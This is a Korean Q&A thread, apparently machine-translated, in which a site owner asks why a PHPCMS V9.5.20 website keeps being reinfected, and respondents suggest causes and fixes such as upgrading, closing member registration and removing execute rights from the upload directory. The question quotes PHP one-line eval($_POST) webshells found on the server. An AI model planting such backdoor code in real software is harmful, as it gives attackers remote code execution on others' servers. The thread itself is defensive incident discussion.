웹사이트 프로그램이 Trojan [<?php eval($_POST[1]);?> ok]에 의해 침입되었습니다. 메커니즘을 찾는 데 도움을 주세요.

Question

해커들의 공격이 빈번히 발생하고 있는 웹사이트입니다. 최대한 빨리 허점을 찾아 고민을 해결할 수 있도록 생각을 명확하게 하기 위해 PHP 전문가의 도움을 요청하고 있습니다!

이제 사건은 다음과 같이 설명됩니다.

1. 이 웹사이트는 PHPCMS_V9_5.20의 기본 버전을 사용하여 구축되었습니다.

2. 모든 파일은 처음에는 완전히 열린 권한으로 서버 루트 디렉터리에 저장됩니다.

3. 나중에 웹사이트가 해킹되어 api.php 및 index.php 항목 파일이 다시 작성되었습니다.

4. 이식된 바이러스 파일은 "One Sentence Trojan"입니다. 내용은 다음과 같습니다.

<?php @eval($_POST['dcs-19']);?>
<?php

5. 문제를 발견한 후 삭제한 후 해당 파일의 권한을 잠그세요. 문제가 해결될 것이라고 생각하는 것입니다. 그런데 며칠 뒤 해당 웹사이트의 스냅샷이 하이재킹된 것을 발견해 다시 트로이목마를 확인해 본 결과, 해당 트로이목마 파일의 위치는 서버 루트 디렉토리의 uploadfile20170527 폴더에 있는 것으로 나타났습니다. . 이 파일은 첨부파일을 업로드하거나 백그라운드에서 기사를 업데이트할 때 날짜를 기준으로 자동 생성됩니다. 하지만 해당 글은 5월 27일 업데이트가 되지 않았으나, 해당 사이트 문제의 근본 원인 조사를 위해 전문가들의 도움을 요청하는 내용의 글이 게재됐다.

트로이 목마의 내용은 다음과 같습니다:

<?php eval($_POST[1]);?>
첨부: 인터넷에서 관련 내용을 확인해 보니 대부분 웹사이트 프로그램 취약점으로 인한 SQL 인젝션 공격이라고 했고, 취약점을 수정하라는 메시지가 떴는데 어떻게 수정해야 할까요? PHP 버전을 온라인으로 업그레이드하는 것이 유용합니까?

【

저는 기술적인 사람이 아니라서 이해가 안되는 부분이 많네요. 이해가 안되는 부분이 있으면 설명에 따라 Q&A에 추가하겠습니다!

】

Answer 1

이 문장의 코드 원리는 매우 간단합니다. POST는 클라이언트가 보낸 데이터를 의미하고, eval은 데이터를 코드로 실행한다는 의미입니다.
해커의 경우 웹페이지의 대화 상자에 코드를 입력하기만 하면 제출 후 실제로 실행됩니다.

이것은 단지 증상일 뿐입니다. 즉, 마지막 백도어가 어떻게 들어와서 백도어를 떠났을 가능성이 너무 많습니까? 업로드 기능에 취약점이 있거나, ftp 비밀번호가 깨졌을 수도 있습니다. 관리자 권한 등을 얻었습니다. 이 트로이목마는 다음 번에는 편의를 위해 마지막에 남겨둡니다.

가장 기본적인 일은 전체 코드 세트를 다운로드하고, 모든 코드를 살펴보고, 자신의 프로그램에 필요하지 않은 경우 모두 처리하는 것입니다. 여기서 하나를 삭제하면 다른 곳에서 다시 업로드하게 됩니다. 끝이 없습니다. 두 번째는 시스템 관리 허점을 막는 것입니다. 업데이트할 수 있는 경우 모든 비밀번호를 변경하고 임의의 강력한 비밀번호를 사용합니다. 그런 다음 이전에 오픈 소스 Linux 서버를 사용했던 것을 기억합니다. . 이름을 잊으셨다면 검색해 보세요.

마지막으로 효과가 없으면 전문가에게 맡겨 투자할 가치가 있는지 확인해보세요. 트로이 목마 제거 및 변경 모니터링 서비스를 제공하는 외국 웹사이트도 있는 것으로 기억합니다. 꽤 비싼 해입니다. 중국에도 같은 서비스가 있는지는 모르겠습니다.

Answer 2

PHHPCMS 취약점에 대한 공지
사용자 여러분께:
안녕하세요!
올해 4월 PHPCMS 프로그램에서 노출된 최신 취약점은 회원 등록 매개변수를 수정하여 웹사이트에 PHP 트로이목마 파일을 주입할 수 있습니다. 당사 테스트 결과, PHPCMS는 회원가입 시 등록정보를 암호화한 후 회원등록을 위해 서버에 전달하는 것으로 나타났습니다. 암호화 방식은 일시적으로 해독할 수 없기 때문에 당사는 해당 정보를 매칭하여 해커의 침입을 차단할 수 없습니다. ;
현재 세 가지 솔루션이 있습니다:

1. 최신 PHPCMS 프로그램으로 업그레이드하세요.

2. 홈페이지 회원가입 기능을 닫습니다.

3. uploadfile 디렉터리의 실행 권한을 취소합니다(이 방법은 트로이 목마 실행을 피할 수 있지만 트로이 목마 파일 업로드를 피할 수는 없습니다).
   위 솔루션 중 하나를 실행한 후에는 uploadfile 디렉터리와 하위 디렉터리에 PHP 파일이 포함되어 있는지 철저히 확인하세요. . 이 디렉터리는 사진을 업로드하기 위한 디렉터리입니다. PHP 파일이 발견되면 트로이 목마 파일이어야 합니다! 빨리 삭제해주세요!

진안네트워크
2017.6.19

Answer 3

서버 비밀번호를 변경하고, SSH 기본 포트를 변경하고, 서버를 다른 서버로 변경하세요. 5~6년 전에 업데이트가 중단된 PHPCMS로 변경되었습니다. 확실히 허점이 많습니다.

Answer 4

权限问题, 업로드 디렉터리에 실행 권한이 활성화되어 있습니다.
문제 해결 방법은 PHPCMS의 취약점을 제거하는 것입니다. 모든 외부 파일(직접 작성하지 않거나 프레임워크에서 작성하지 않은 코드)의 디렉터리에 대한 실행 권한을 제거해야 합니다.

으아악

Answer 5

위의 두 답변: 你的上传目录开了可执行权限、取消uploadfile目录的执行权限
이게 무슨 뜻인가요? 디렉터리 실행 권한을 취소했는데, 디렉터리를 열 수 없고, 사진을 업로드할 수 없습니다. 그래도 되나요?